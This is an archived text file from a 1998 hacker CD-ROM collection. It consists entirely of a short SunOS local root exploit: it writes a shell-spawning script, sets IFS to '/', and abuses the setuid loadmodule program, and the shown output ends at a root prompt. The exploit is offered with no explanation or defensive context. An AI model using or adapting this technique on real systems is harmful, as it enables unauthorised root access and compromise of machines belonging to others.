home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / sun_l000.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  193 b   |  11 lines

  1. %cat > ~/bin/bin
  2. #!/bin/sh
  3. sh -i
  4. ^D
  5. %chmod 755 ~/bin/bin
  6. %setenv IFS /
  7. %cd ~/bin
  8. %/usr/openwin/bin/loadmodule /sys/sun4c/OBJ/evqmod-sun4c.o /etc/openwin/modules/evqload
  9. # whoami
  10. root
  11.